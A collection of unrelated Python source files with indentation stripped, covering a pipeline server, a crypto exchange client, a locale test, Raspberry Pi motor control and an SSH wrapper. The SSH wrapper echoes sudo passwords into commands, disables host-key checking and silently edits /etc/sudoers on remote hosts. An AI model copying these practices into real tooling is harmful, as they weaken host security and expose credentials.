# at this point requests made to the Pyro daemon will touch process `t`'s copy
# of the pipeline, so modifiying `pipeline` won't have any effect. The exception is
# communication through its multiprocessing.Event, which we use below to wait
# for termination.
#FIXME does this leak the memory used by the old pipeline?
#if so, avoid doing this or at least `del` the old graph ...
verboseprint("Daemon is running at: %s" % daemon.locationStr)
logger.info("Daemon is running at: %s", daemon.locationStr)
verboseprint("The pipeline's uri is: %s" % str(pipelineURI))
logger.info("The pipeline's uri is: %s", str(pipelineURI))
e = pipeline.shutdown_ev
# handle SIGTERM (sent by SciNet 15-30s before hard kill) by setting
# the shutdown event (we shouldn't actually see a SIGTERM on PBS
# since PBS submission logic gives us a lifetime related to our walltime
# request ...)
def handler(sig, _stack):
e.set()
signal.signal(signal.SIGTERM, handler)
# spawn a loop to manage executors in a separate process
# (here we use a proxy to make calls to manageExecutors because (a)
# processes don't share memory, (b) so that its logic is
# not interleaved with calls from executors. We could instead use a `select`
# for both Pyro and non-Pyro socket events; see the Pyro documentation)
p = Pyro4.Proxy(pipelineURI)
#mem, memAvail = pipeline.options.execution.mem, pipeline.memAvail
def loop():
try:
logger.debug("Auxiliary loop started")
logger.debug("memory limit: %.3G; available after server overhead: %.3fG" % (options.execution.mem, pipeline.memAvail))
while p.continueLoop():
p.manageExecutors()
e.wait(LOOP_INTERVAL)
except:
logger.exception("Server loop encountered a problem. Shutting down.")
finally:
logger.info("Server loop going to shut down ...")
p.set_shutdown_ev()
h = Process(target=loop)
h.daemon = True
h.start()
#del pipeline # `top` shows this has no effect on vmem
try:
jid = os.environ["PBS_JOBID"]
output = subprocess.check_output(['qstat', '-f', jid], stderr=subprocess.STDOUT)
time_left = int(re.search('Walltime.Remaining = (\d*)', output).group(1))
logger.debug("Time remaining: %d s" % time_left)
time_to_live = time_left - shutdown_time
except:
logger.info("I couldn't determine your remaining walltime from qstat.")
time_to_live = None
flag = e.wait(time_to_live)
if not flag:
logger.info("Time's up!")
e.set()
# FIXME if we terminate abnormally, we should _actually_ kill child executors (if running locally)
except KeyboardInterrupt:
logger.exception("Caught keyboard interrupt, killing executors and shutting down server.")
print("\nKeyboardInterrupt caught: cleaning up, shutting down executors.\n")
sys.stdout.flush()
except:
logger.exception("Exception running server in daemon.requestLoop. Server shutting down.")
raise
else:
# allow time for all clients to contact the server and be told to shut down
# (we could instead add a way for the server to notify its registered clients):
# otherwise they will crash when they try to contact the (shutdown) server.
# It's not important that clients shut down properly (if they see a server crash, they
# will cancel their running jobs, but they're done by the time the server exits)
# TODO this only makes sense if we are actually shutting down nicely,
# and not because we're out of walltime, in which case this doesn't help
# (client jobs will die anyway)
#print("Sleeping %d s to allow time for clients to shutdown..." % pe.SHUTDOWN_TIME)
#time.sleep(pe.SHUTDOWN_TIME)
# trying to access variables from `p` in the `finally` clause (in order
# to print a shutdown message) hangs for some reason, so do it here instead
p.printShutdownMessage()
finally:
# brutal, but awkward to do with our system of `Event`s
# could send a signal to `t` instead:
t.terminate()
def flatten_pipeline(p):
"""return a list of tuples for each stage.
Each item in the list is (id, command, [dependencies])
where dependencies is a list of stages depend on this stage to be complete before they run.
"""
def post(x, y):
if y[0] in x[2]:
return 1
elif x[0] in y[2]:
return -1
else:
return 0
return sorted([(i, str(p.stages[i]), p.G.predecessors(i)) for i in p.G.nodes()], key=functools.cmp_to_key(post))
def pipelineDaemon(pipeline, options, programName=None):
"""Launches Pyro server and (if specified by options) pipeline executors"""
if options.execution.urifile is None:
options.execution.urifile = create_uri_filename_from_options(options.application.pipeline_name)
if options.application.restart:
pipeline.skip_completed_stages()
if len(pipeline.runnable) == 0:
print("\nPipeline has no runnable stages. Exiting...")
sys.exit()
logger.debug("Prior to starting server, total stages %i. Number processed: %i.",
len(pipeline.stages), pipeline.num_finished_stages)
logger.debug("Number of runnable stages: %i",
len(pipeline.runnable))
pipeline.programName = programName
try:
# we are now appending to the stages file since we've already written
# previously completed stages to it in skip_completed_stages
with open(pipeline.backupFileLocation, 'a') as fh:
pipeline.finished_stages_fh = fh
logger.debug("Starting server...")
launchServer(pipeline)
except:
logger.exception("Exception (=> quitting): ")
raise
#finally:
# sys.exit(0)
|
exchange_client.py
|
# from abc import ABC, abstractmethod
from time import sleep, time
import requests
import sys
from silver_waffle.base.side import ASK, BID
from silver_waffle.base.exchange import Order, Currency, Pair
from silver_waffle.credentials import Credential
import silver_waffle.credentials
from random import randint
import json
import websocket
import ccxt
import threading
from tenacity import RetryError, retry, stop_after_attempt
import importlib
number_of_attempts = 10
class ExchangeClient:
all_currencies = []
CCXT_QUOTE_KEYS = ['quote', 'quoteAsset', 'quote_currency']
CCXT_BASE_KEYS = ['base', 'baseAsset', 'base_currency']
CCXT_TICKSIZE_KEYS = ['tickSize', 'price_tick', 'minimum_order_amount']
def __init__(self, exchange: str = None, websockets_client=None,
socket_settings={'book': True, 'orders': True, 'transactions': True},
whitelist=None, creds={}, read_only=None, auto_initialize=True, auto_detect_credentials=True):
if exchange is not None:
try:
if creds:
if isinstance(creds, Credential):
self.ccxt_client = getattr(ccxt, exchange)(creds.to_ccxt_credential())
else:
self.ccxt_client = getattr(ccxt, exchange)(creds)
self.read_only = False
if not creds:
if auto_detect_credentials:
credentials = silver_waffle.credentials.find_credentials_by_exchange_name(exchange)
if credentials:
print(f"Found credentials for exchange {exchange}")
self.ccxt_client = getattr(ccxt, exchange)(credentials[0].to_ccxt_credential())
self.read_only = False
else:
self.ccxt_client = getattr(ccxt, exchange)()
self.read_only = True
else:
self.ccxt_client = getattr(ccxt, exchange)()
self.read_only = True
if read_only is not None:
self.read_only = read_only
except AttributeError:
try:
module = importlib.import_module(f'silver_waffle.exchanges.{exchange.lower()}')
return getattr(module, exchange.lower().capitalize())()
except (ModuleNotFoundError, AttributeError):
raise ValueError('Exchange not found')
self.creds = creds
self.websockets_client = websockets_client
self.name = exchange
self._update_book_sleep_time = 1
self._update_balance_sleep_time = 7
self.pairs = set()
self.pairs_by_ticker = {}
self.pairs_to_always_update = set()
self.currencies_by_symbol = {}
self.currencies = set()
self._rate_limits_timestamps = {}
self.cooldown = 2
self.threads = {}
self.update_book_if_balance_is_empty = True
self._whitelist = whitelist
self._socket_settings = socket_settings
self.socket_functionality = {}
if auto_initialize:
self.initialize()
def initialize(self):
currencies, pairs = self.get_list_of_currencies_and_pairs(whitelist=self._whitelist)
for pair in pairs:
self._register_pair_and_currencies(pair, socket_settings=self._socket_settings)
if self.read_only is False:
for currency in [pair.base, pair.quote]:
if not (currency in self.threads and self.threads[currency]):
self._launch_thread(self.__update_balance_daemon__, currency)
self.all_currencies += currencies
for currency in currencies:
currency_count = 0
for all_currency in self.all_currencies:
if currency.symbol.lower() == all_currency.symbol.lower():
currency_count += 1
if currency_count == 1:
self._launch_thread(self.__update_global_price_daemon__, currency)
@retry(stop=stop_after_attempt(number_of_attempts))
def get_book(self, pair):
"""Returns a dictionary containing the buy and sell orders.
return format: {ASK: list_of_asks, BID: list_of_bids}"""
book = self.ccxt_client.fetch_order_book(pair.ticker)
asks = [{'amount': x[1], 'price': x[0]} for x in book['asks']]
bids = [{'amount': x[1], 'price': x[0]} for x in book['bids']]
return {ASK: asks, BID: bids}
@retry(stop=stop_after_attempt(number_of_attempts))
def get_balance(self, currency):
"""Returns the available and locked balance of a currency, in that order"""
balances = self.ccxt_client.fetch_balance()
try:
return balances[currency.symbol]['free'], balances[currency.symbol]['used']
except KeyError:
return 0, 0
@retry(stop=stop_after_attempt(number_of_attempts))
def get_active_orders(self, pair):
orders = self.ccxt_client.fetch_open_orders(symbol=pair.ticker)
result = {ASK: [], BID: []}
for order in orders:
side = ASK if order['side'] == 'sell' else BID
result[side].append(Order(order['price'], side, order['amount'], order_id=order['id'], pair=pair))
return result
@retry(stop=stop_after_attempt(number_of_attempts))
def cancel_order(self, order):
try:
self.ccxt_client.cancel_order(order.order_id, order.pair.ticker)
except ccxt.base.errors.ArgumentsRequired:
print(order.pair.ticker)
def create_order(self, pair, amount, side, limit_price=None):
if limit_price is None:
if side is ASK:
self.ccxt_client.create_market_sell_order(pair.ticker, amount)
elif side is BID:
self.ccxt_client.create_market_buy_order(pair.ticker, amount)
else:
if side is ASK:
order = self.ccxt_client.create_limit_sell_order(pair.ticker, amount, limit_price)
elif side is BID:
order = self.ccxt_client.create_limit_buy_order(pair.ticker, amount, limit_price)
return Order(limit_price, side, amount, pair=pair, order_id=order['id'])
def subscribe(self, pair):
self._register_pair_and_currencies(pair)
self.__start_threads__(pair)
def unsubscribe(self, pair):
pass
@retry(stop=stop_after_attempt(number_of_attempts))
def get_list_of_currencies_and_pairs(self, whitelist=None):
markets = self.ccxt_client.fetch_markets()
list_of_currencies = set([])
list_of_pairs = []
for pair in markets:
if pair['active'] is False:
continue
for quote_key, base_key in zip(self.CCXT_QUOTE_KEYS, self.CCXT_BASE_KEYS):
try:
quote_symbol = pair['info'][quote_key]
base_symbol = pair['info'][base_key]
except KeyError:
continue
base_curr = quote_curr = None
ticker = pair['symbol']
#CCXT is inconsistent across exchanges so we have to do this
for key in self.CCXT_TICKSIZE_KEYS:
try:
minimum_step = pair['info'][key][0]
break
except KeyError:
try:
minimum_step = pair['info']['filters'][0][key]
break
except KeyError:
try:
minimum_step = pair['info'][key]
break
except KeyError:
continue
if whitelist is not None and ticker not in whitelist:
continue
for curr in list_of_currencies:
if base_symbol == curr.symbol:
base_curr = curr
if quote_symbol == curr.symbol:
quote_curr = curr
if not base_curr:
base_curr = Currency(name=base_symbol, symbol=base_symbol,
exchange_client=self)
if not quote_curr:
quote_curr = Currency(name=quote_symbol, symbol=quote_symbol,
exchange_client=self)
pair = Pair(ticker=ticker, quote=quote_curr, base=base_curr,
minimum_step=minimum_step, exchange_client=self)
# print(f"{pair.quote.name}{pair.base.name}")
list_of_pairs.append(pair)
list_of_currencies.add(quote_curr)
list_of_currencies.add(base_curr)
return list(list_of_currencies), list_of_pairs
def get_pair_by_ticker(self, ticker):
for pair in self.pairs:
if pair.ticker.lower() == ticker.lower():
return pair
def _register_pair_and_currencies(self, pair, socket_settings=None):
self.pairs.add(pair)
self.currencies.add(pair.quote)
self.currencies.add(pair.base)
self.pairs_by_ticker.update({pair.ticker: pair})
self.currencies_by_symbol.update({pair.quote.symbol: pair.quote, pair.base.symbol: pair.base})
if socket_settings:
self.socket_functionality[pair] = socket_settings
def _launch_thread(self, thread, pair_or_currency):
thread = threading.Thread(target=thread, args=[pair_or_currency])
thread.daemon = True
if pair_or_currency not in self.threads:
self.threads[pair_or_currency] = []
self.threads[pair_or_currency].append(thread)
thread.start()
def __start_threads__(self, pair):
assert pair in self.pairs
if not (pair in self.threads and self.threads[pair]):
self._launch_thread(self.__update_book_daemon__, pair)
# for currency in [pair.quote, pair.base]:
# if not (currency in self.threads and self.threads[currency]):
#
def __update_book_daemon__(self, pair):
def exit_thread():
self.threads[pair] = None
sys.exit() # exit from the current thread
sleep(randint(0, self._update_book_sleep_time))
while True:
while self.socket_functionality[pair]['book'] is True and self.websockets_client is not None:
sleep(self._update_book_sleep_time)
if not self.update_book_if_balance_is_empty:
if pair.status[BID] and not pair.status[ASK] and pair.quote.balance_is_empty():
sleep(5)
continue
if pair.status[ASK] and not pair.status[BID] and pair.base.balance_is_empty():
sleep(5)
continue
if pair.base.balance_is_empty() and pair.quote.balance_is_empty():
sleep(5)
continue
if pair or pair in self.pairs_to_always_update:
pair.orderbook.update(self.get_book(pair))
sleep(self._update_book_sleep_time)
else:
sleep(5)
def __update_balance_daemon__(self, currency):
sleep(randint(0, self._update_balance_sleep_time))
while True:
if currency.has_an_active_pair():
currency.update_balance()
sleep(self._update_balance_sleep_time)
def __update_global_price_daemon__(self, currency):
sleep(randint(20, 80))
while True:
currencies_to_update = []
for all_currency in self.all_currencies:
if currency.symbol.lower() == all_currency.symbol.lower():
currencies_to_update.append(all_currency)
try:
price = currency.get_global_price()
except (requests.exceptions.HTTPError, UnboundLocalError):
continue
except Exception:
sys.exit()
# log this
for currency in currencies_to_update:
currency.global_price = price
sleep(120)
def __str__(self):
return self.name
def __repr__(self):
return self.__str__()
class WebsocketsClient(object):
def __init__(self, ws_uri, exchange_client):
self._ws_url = ws_uri
self.exchange_client = exchange_client
self.ws_client = websocket.WebSocketApp(self._ws_url,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close)
self._print = False
self.is_closed = True
def connect(self):
self.wst = threading.Thread(target=self._connect)
self.wst.daemon = True
self.wst.start()
def _connect(self):
self.ws_client.on_open = self._on_open
self.ws_client.run_forever()
def send(self, message):
self.ws_client.send(json.dumps(message))
def close(self):
self.ws_client.close()
def _on_close(self, ws):
self.is_closed = True
def _on_error(self, ws, error):
print(error)
def _on_open(self, ws):
self.is_closed = False
# self.ws_client.send(json.dumps({'action': 'subscribe', 'book': 'btc_mxn', 'type': 'orders'}))
# for channel in self.channels:
# self.ws_client.send(json.dumps({'action': 'subscribe', 'book': self.book, 'type': channel}))
# self.listener.on_connect()
def _on_message(self, ws, m):
if self._print is False:
self.exchange_client.websocket_handler(json.loads(m))
else:
print(m)
|
test_i18n.py
|
import threading
from goodboy.i18n import get_current_locale, set_process_locale, set_thread_locale
def test_set_process_locale():
set_process_locale(["process_locale_name"])
assert get_current_locale() == ["process_locale_name"]
def test_set_thread_locale():
set_process_locale(["main_thread_locale"])
child_locales = {}
def child_thread_target():
child_locales["before"] = get_current_locale()
set_thread_locale(["child_thread_locale"])
child_locales["after"] = get_current_locale()
child_thread = threading.Thread(target=child_thread_target)
child_thread.start()
child_thread.join()
assert get_current_locale() == ["main_thread_locale"]
assert child_locales["before"] == ["main_thread_locale"]
assert child_locales["after"] == ["child_thread_locale"]
|
motors.py
|
import RPi.GPIO as GPIO
import time
import threading
usleep = lambda x: time.sleep(x/1000.0/1000.0)
coordToSteps = 2000.0 / 6.0
RESET_POS = [-0.22, -0.64] # 6.6cm/grid -4cm/6.6=-0.6, -1.5cm/6.6=-0.22
# Mot1 on board, Mot2 below
dirPin = [29,33]
stepPin = [31,35]
sleepPin = [32,36]
triggerPin = [16,40]
triggerSet = [False, False]
delay = 1800.0
stop = False
def daemon():
c = 0
while not stop:
time.sleep(0.01)
if GPIO.input(triggerPin[0]) == 1:
c += 1
else:
c = 0
if c == 5:
triggerSet[0] = True
def trigger1(channel):
triggerSet[1]=True
def move(steps):
for j in range(2):
GPIO.output(dirPin[j], GPIO.HIGH if steps[j]<0 else GPIO.LOW)
if not steps[j] == 0:
GPIO.output(sleepPin[j], GPIO.HIGH)
steps[j] = abs(steps[j])
time.sleep(0.15)
for i in range(max(steps[0], steps[1])):
for j in range(2):
if i>=steps[j]:
continue
GPIO.output(stepPin[j], GPIO.HIGH)
usleep(1)
GPIO.output(stepPin[j], GPIO.LOW)
t = 400.0 #steps until full speed
d_start = 4000.0 #start delay
f_i = (d_start-delay)/(t*t) * (i-t)*(i-t) + delay #calc delay
usleep(f_i if i < t else delay)
time.sleep(0.1)
for j in range(2):
GPIO.output(sleepPin[j], GPIO.LOW)
GPIO.setmode(GPIO.BOARD)
# Initialize to LOW
for pin in [dirPin, stepPin, sleepPin]:
GPIO.setup(pin, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(triggerPin[0], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(triggerPin[1], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
d = threading.Thread(name='Daemon', target=daemon)
d.setDaemon(True)
d.start() # Event detect doesn't work because of fluctuations
GPIO.add_event_detect(triggerPin[1], GPIO.RISING, callback=trigger1)
posx = 0
posy = 0
def goTo(tx, ty):
global posx, posy
x = int((tx - posx) * coordToSteps)
y = int((ty - posy) * coordToSteps)
print("Moving from " + str((posx,posy)) + " to " + str((tx,ty)))
move([x,y])
posx = tx # Must be in simple coordinate system!
posy = ty
def reset():
goTo(RESET_POS[0], RESET_POS[1])
global posx, posy
posx = RESET_POS[0]
posy = RESET_POS[1]
triggerSet[0] = (GPIO.input(triggerPin[0]) == 1)
while not triggerSet[0]:
xy = [-10, 0]
move(xy)
triggerSet[1] = (GPIO.input(triggerPin[1]) == 1)
while not triggerSet[1]:
xy = [0, -10]
move(xy)
def shutdown():
GPIO.output(sleepPin[0], GPIO.LOW)
GPIO.output(sleepPin[1], GPIO.LOW)
stop = True
|
sshshell.py
|
"""
SSH shell implementation.
"""
import logging
import select
import socket
import StringIO
import subprocess
import threading
import time
import uuid
import paramiko
from scp import SCPClient
from jammy.exceptions import JammyError, CommandError, CommandTimeout, SshError
from jammy.waituntil import retry_on_exception
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logging.getLogger("paramiko").setLevel(logging.WARNING)
CHUNK_SIZE = 4096
RETRY_TIMEOUT_S = 15
def _maybe_add_password(command, password):
"""
Add sudo password to command if required. Else NOOP.
in: sudo apt-get install
out: echo 'password' | sudo -S apt-get install
"""
if not password or 'sudo' not in command: # or 'sudo -S' in command:
return command
# Handle commands that are chained with &&
blocks = command.split('&&')
def fix_block(block):
"""Adds sudo and password where needed"""
if 'sudo' in block and 'sudo -S' not in block:
# Split the command string into a list of words
words = block.split()
for i, word in enumerate(words):
if word == 'sudo':
words.insert(i + 1, '-S')
break
words.insert(0, "echo '%s' |" % password)
return ' '.join(words)
return block
fixed_blocks = [fix_block(block) for block in blocks]
return '&&'.join(fixed_blocks)
class SshShell(object):
"""Wrapper class around paramiko."""
def __init__(self,
host,
user='ubuntu',
password='',
private_key_path=None,
port=22):
"""
Initializer.
:param host: host/ip to ssh into
:param user: username to log in with
:param password: password to log in with
:param private_key_path: path to the private key
:param port: port number to connect to
"""
# Hostname shell connects to
self.host = host
# Port shell connects to
self.port = port
# Username shell connects with
self.user = user
# Password shell connects with
self.password = password
# Private key shell connects with
self.private_key_path = private_key_path
# The underlying paramiko ssh client
self.ssh_client = None
# paramiko.Transport object
self.transport = None
# sftp object to upload/download files
# from the instance
self.sftp_client = None
def connect(self, timeout=60):
"""
Start up paramiko and connects to the host.
:param timeout: an optional timeout (in seconds) for waiting for
ssh banner coming out. Defaults to 60 seconds.
:raises SshError: on other error
"""
try:
self.ssh_client = self.get_ssh_client(self.host, self.user,
sock=None, timeout=timeout,
port=self.port)
self.transport = self.ssh_client.get_transport()
self.transport.set_keepalive(30)
except Exception as e:
logger.error('Could not connect to %s:%s as user "%s". Error: %s',
self.host, self.port, self.user, e)
self.disconnect()
raise
def disconnect(self):
"""Disconnect from the host."""
if self.transport:
self.transport.close()
if self.ssh_client:
self.ssh_client.close()
# Clear these to make sure we get a clean reconnect
self.ssh_client = None
self.transport = None
def get_end_time(self, timeout):
# no timeout means timeout in 1 hour
if not timeout:
return time.time() + float("inf")
return time.time() + timeout
def _forwarder(self, host, port):
""" Trivial forwarder. We only support 1 session at a time.
"""
while True:
chan = None
while chan is None:
chan = self.transport.accept(5)
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
logger.error('forwarding request to %s:%d failed: %r' %
(host, port, e))
chan.close()
continue
logger.debug('Tunnel open %r -> %r -> %r' % (chan.origin_addr,
chan.getpeername(), (host, port)))
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(16384)
if len(data) == 0:
break
chan.sendall(data)
if chan in r:
data = chan.recv(16384)
if len(data) == 0:
break
sock.sendall(data)
chan.close()
sock.close()
logger.debug('Tunnel closed from %r', chan.origin_addr)
def forward_remote(self, lport, address):
""" Forward port 'lport' on the host we're connected to with
SSH to a remote server at 'address', where 'address' is a
standard '(host, port)' tuple.
If 'address' is None, return the transport to accept on.
Otherwise, start a thread that connects the transport to
the remote server.
"""
if (not self.transport) or (not self.transport.is_active()):
self.connect()
self.transport.request_port_forward('', lport)
if address is None:
return self.transport
thr = threading.Thread(target=self._forwarder, args=address)
thr.setDaemon(True)
thr.start()
return None
def _read_channel(self, channel, stdout, stderr):
"""Read the channels stdout and stderr until there is no more data"""
while True:
stdout_data = None
stderr_data = None
if channel.recv_ready():
stdout_data = channel.recv(CHUNK_SIZE)
stdout.write(stdout_data)
if channel.recv_stderr_ready():
stderr_data = channel.recv_stderr(CHUNK_SIZE)
stderr.write(stderr_data)
if not stdout_data and not stderr_data:
break
def _exec_command(self, channel, command, timeout):
"""Executes the command on the given channel
:raises CommandTimeout: on command timeout
:raises socket.timeout: on channel timeout
:return: output, exit_code
"""
end_time = self.get_end_time(timeout)
channel.exec_command(command)
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
# Read until we time out or the channel closes
while time.time() < end_time:
self._read_channel(channel, stdout, stderr)
if channel.exit_status_ready():
break
if int(time.time()) % 60 == 0:
logging.info('Still waiting for command "%s"', command)
time.sleep(1)
self._read_channel(channel, stdout, stderr)
if not channel.exit_status_ready():
raise CommandTimeout(
'Command "%s" timed out after %d seconds. Output so far: '
'(%s,%s)' % (command, timeout, stdout.getvalue(),
stderr.getvalue()))
exit_status = channel.recv_exit_status()
# recv_exit_status might flush out some more data to the output
# according to the paramiko documentation
self._read_channel(channel, stdout, stderr)
return stdout.getvalue(), stderr.getvalue(), exit_status
def exec_command(self, command, timeout=120, except_on_error=False):
"""
Execute the given command.
This is for a single command only, no
shell is running, so an exec_command cannot use environment variables
or directory changes etc. from a previous exec_command.
:param command: command to send
:param timeout: seconds to wait for command to finish. None to disable
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:raises SshError: if not connected
:raises CommandError: on non-zero return code from the command and
except_on_error is True
:raises CommandTimeout: on timeout
:return: (output, exit_code) for the command.
"""
command_with_password = _maybe_add_password(command, self.password)
if command_with_password != command:
logger.info('%s:%s Executing command "%s" with password',
self.host, self.port, command)
command = command_with_password
else:
logger.info('%s:%s Executing command "%s"', self.host, self.port,
command)
# connect if ssh is not connected
if not self.transport or not self.transport.is_active():
self.connect()
channel = self._open_ssh_session(timeout)
agent = paramiko.agent.AgentRequestHandler(channel)
channel.get_pty()
# Put stderr into the same output as stdout.
channel.set_combine_stderr(True)
try:
output, _, exit_status = self._exec_command(channel, command,
timeout)
except socket.timeout:
logger.exception('Channel timed out')
raise CommandTimeout(
'Command "%s" failed due to socket timeout. Output so far: '
'%s' % (command, output))
finally:
agent.close()
channel.close()
# If the command failed and the user wants an exception, throw it!
if exit_status != 0 and except_on_error:
raise CommandError('Command "%s" returned %d with the output:\n%s'
% (command, exit_status, output))
if output:
logger.info("Command output: %s", output)
else:
logger.info('Command finished without output')
return (output, exit_status)
def _open_ssh_session(self, timeout):
try:
channel = retry_on_exception(self.transport.open_session)
except:
self.disconnect()
self.connect()
channel = retry_on_exception(self.transport.open_session)
channel.settimeout(timeout)
return channel
def exec_command_separate_stdout_stderr(self, command, timeout=120,
except_on_error=False):
"""
Execute the given command, returns stdout and stderr seperately.
The reason for more or less copy pasting exec_command is that the
return type of this function is different, and it also does not
get_pty. Because of these small differences and the fact that
exec_command is used everywhere in Yolo, we want this in its own
function.
This is for a single command only, no
shell is running, so an exec_command cannot use environment variables
or directory changes etc. from a previous exec_command.
NOTE: Running with the combine_stderr flag set to False will disallow
running sudo commands in some cases, so only do this if you
really need to separate the output
:param command: command to send
:param timeout: seconds to wait for command to finish. None to disable
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:raises SshError: if not connected
:raises CommandError: on non-zero return code from the command and
except_on_error is True
:raises CommandTimeout: on timeout
:return: (stdout, stderr, exit_code) for the command
"""
command_with_password = _maybe_add_password(command, self.password)
if command_with_password != command:
logger.info('Executing command "%s" with password', command)
command = command_with_password
else:
logger.info('Executing command "%s"', command)
# connect if ssh is not connected
if not self.transport or not self.transport.is_active():
self.connect()
channel = self._open_ssh_session(timeout)
agent = paramiko.agent.AgentRequestHandler(channel)
# Whether or not to put stdout and stdin in the same output
channel.set_combine_stderr(False)
try:
stdout, stderr, exit_status = self._exec_command(channel, command,
timeout)
except socket.timeout:
logger.exception('Channel timed out')
raise CommandTimeout(
'Command "%s" failed due to socket timeout. Output so far: '
'(%s, %s)' % (command, stdout, stderr))
finally:
agent.close()
channel.close()
# If the command failed and the user wants an exception, throw it!
if exit_status != 0 and except_on_error:
raise CommandError(
'Command "%s" returned %d with the output:\n(%s,%s)'
% (command, exit_status, stdout, stderr))
if stdout or stderr:
logger.info("Command output: (%s,%s)", stdout, stderr)
return (stdout, stderr, exit_status)
def exec_background(self, command, except_on_error=False):
"""
Execute a command that starts a background process.
:param command: the command, should end with "&"
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:return: (output, exit_code) for the command.
"""
# Write the command to a temporary shell script, run the script,
# then delete it. This seems to be the only reliable way to start
# a background process without hanging the ssh session.
temp_filename = str(uuid.uuid4()).split('-')[0] + '.sh'
self.exec_command(
'echo "%s" > /tmp/%s' % (command, temp_filename),
except_on_error=True
)
self.exec_command(
'nohup sh /tmp/%s' % temp_filename,
except_on_error=except_on_error
)
self.exec_command('rm /tmp/%s' % temp_filename, except_on_error=True)
def get_pty(self, term='console'):
"""
Create a pseudo terminal on the instance.
This should be used over exec_command whenever a shell/tty is
necessary.
:raises SshError: if the SSH connection has not been
established.
:return: An Paramiko channel to communicate statefully.
"""
if not self.is_connected():
raise SshError('Not connected!')
channel = self.transport.open_session()
channel.get_pty(term, 80, 24)
channel.invoke_shell()
channel.set_combine_stderr(True)
return channel
def is_connected(self):
"""
Check whether SSH connection is established or not.
:return: True if it is connected; returns False otherwise.
"""
if self.transport and self.transport.is_active():
return True
return False
def get_ssh_client(self,
hostname,
username,
sock=None,
timeout=60,
port=22):
"""
Return an instance of paramiko.
SSHClient that is connected to the supplied hostname.
"""
ssh = paramiko.SSHClient()
ssh.load_system_host_keys("/dev/null")
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname, username=username, sock=sock,
key_filename=self.private_key_path, password=self.password,
port=port, timeout=timeout)
return ssh
def get_sftp_client(self):
"""Return a paramiko sftp client."""
if self.sftp_client is None:
self.connect()
self.sftp_client = paramiko.SFTPClient.from_transport(
self.transport)
return self.sftp_client
def upload_file(self, source_file, dest_file, timeout=60):
"""SCP upload a file from local host to remote machine."""
ssh_client = self.get_ssh_client(self.host, self.user, sock=None,
timeout=timeout, port=self.port)
transport = ssh_client.get_transport()
with SCPClient(transport) as scp_client:
scp_client.put(source_file, dest_file)
transport.close()
ssh_client.close()
def download_file(self, source_file, dest_file):
"""SCP download a file from remote host to local host."""
ssh_client = self.get_ssh_client(self.host, self.user, sock=None,
timeout=60, port=self.port)
transport = ssh_client.get_transport()
with SCPClient(transport) as scp_client:
scp_client.get(source_file, dest_file)
transport.close()
ssh_client.close()
def alt_exec_command(self, cmd, type='ssh', timeout=360, retries=1,
raise_on_error=False, username=None):
"""
Executes the given command by running ssh in a subprocess.
This is a workaround for an issue with exec_command where
it times out or crashes, seemingly randomly, in situations where a lot
of commands are executed in parallel. One situation where this occured
frequently was running the same benchmark with different
configurations (in separate processes).
To summarize: Only use this if you are running into random crashes
or freezes when ssh:ing in parallel.
Otherwise, please use exec_command.
"""
if type != 'ssh':
raise JammyError("unknown shell")
username = username or self.user
host = username + "@" + self.host
cmd_list = ['ssh', '-tt', '-o', 'StrictHostKeyChecking=no', host, cmd]
logger.info('Executing Popen ssh command: %s', cmd_list)
for i in range(retries):
p = subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
end_time = time.time() + timeout
while time.time() < end_time:
if p.poll() is not None:
break
time.sleep(10)
exit_status = p.returncode
output = p.stdout.read()
if exit_status is None:
raise CommandTimeout('Command "%s" timed out after %d seconds'
% (cmd, timeout))
elif exit_status != 0:
logger.info("error executing `%s`, exit_status %d, "
"output: %s", cmd, exit_status, output)
if i < retries - 1:
logger.info("Sleeping for %d seconds before retrying",
RETRY_TIMEOUT_S)
time.sleep(RETRY_TIMEOUT_S)
else:
break
if raise_on_error:
assert exit_status == 0, 'output: %s' % (output)
return output, exit_status
def alt_exec_background(self, cmd, type='ssh', username=None):
"""
For when you want to run sudo commands in the background in the guest.
For all other background running use cases, see exec_background.
"""
if type != 'ssh':
raise JammyError("unknown shell")
(out, xc) = self.exec_command("sudo cat /etc/sudoers")
if "!requiretty" not in out:
logging.info(
"Did not find that requiretty was disabled, disabling!")
"""
We add a line to /etc/sudoers that allows us to do ssh commands
without the -tt flag. We do this because the -tt flag messes
up when we run in the background.
We add the line by first creating a script that looks like this:
!#/bin/bash
printf '\nDefaults\t!requiretty' >> /etc/sudoers
and then running that script as sudo. We can't run the script as
sudo without saving it to a file first, because then we get
blocked by the read-only nature of the /etc/sudoers file.
The reason the below command looks so extremely convoluted is
that we first need to break special characters for Python, and
then also break characters for the shell. We run the script
and make sure to remove it afterwards.
"""
self.exec_command(
"printf \"#\"'!'\"/bin/bash\\nprintf '\\\\\\nDefaults"
"\\\\\\t\"'!'\"requiretty\\\\\\n' >> /etc/sudoers\\n\""
" > tmp.sh && sudo sh tmp.sh && rm tmp.sh")
username = username or self.user
host = username + "@" + self.host
cmd = ('sudo -b nohup bash -c "{ %s; } < /dev/null 2>&1 >> '
'background_output.log"' % cmd)
cmd_list = ['ssh', '-o', 'StrictHostKeyChecking=no', host, cmd]
logging.info('Executing Popen ssh command: %s', cmd_list)
subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
